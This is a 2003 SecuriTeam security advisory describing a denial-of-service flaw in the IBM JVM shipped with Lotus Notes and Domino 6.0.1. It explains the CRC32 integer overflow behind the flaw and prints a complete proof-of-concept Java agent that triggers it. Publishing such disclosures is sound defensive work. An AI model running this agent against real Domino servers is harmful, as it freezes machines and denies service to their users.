[NEWS] Java Agent Freezes Lotus Notes and Domino
From: support@securiteam.com
Date: 04/21/03
From: support@securiteam.com To: list@securiteam.com Date: 21 Apr 2003 19:19:51 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Java Agent Freezes Lotus Notes and Domino
------------------------------------------------------------------------
SUMMARY
A specially crafted "agent" causes the IBM JVM 1.3.1 shipped with Lotus
Domino 6.0.1 and Lotus Notes 6.0.1 to crash. After the agent is called, a
huge amount of memory is not freed, which causes the server machine
(observed on MS XP) to freeze and deny further service.
This vulnerability is related to our previously published article,
"Denial of Service Holes Found in JDK":
<http://www.securiteam.com/securitynews/5DP0Q0U9GO.html>
DETAILS
Vulnerable systems:
* Lotus Notes version 6.0.1
* Lotus Domino version 6.0.1
Analysis:
The call to the "update" method of CRC32 raises an integer overflow in the
Java java.util.zip.* core libraries, which triggers a JNI routine that
cannot handle the extremely high input value.
Agent code (Exploit):
import lotus.domino.*;
import java.util.zip.*;

public class JavaAgent extends AgentBase {
    public void NotesMain() {
        try {
            Session session = getSession();
            AgentContext agentContext = session.getAgentContext();
            CRC32 crc32 = new CRC32();
            // Offset 4 plus length 0x7ffffffc exceeds the signed 32-bit int range
            crc32.update(new byte[0], 4, 0x7ffffffc);
            // (Your code goes here)
        } catch(Exception e) {
            e.printStackTrace();
        }
    }
}
ADDITIONAL INFORMATION
The information has been provided by Marc Schoenefeld
<mailto:schonef@uni-muenster.de>.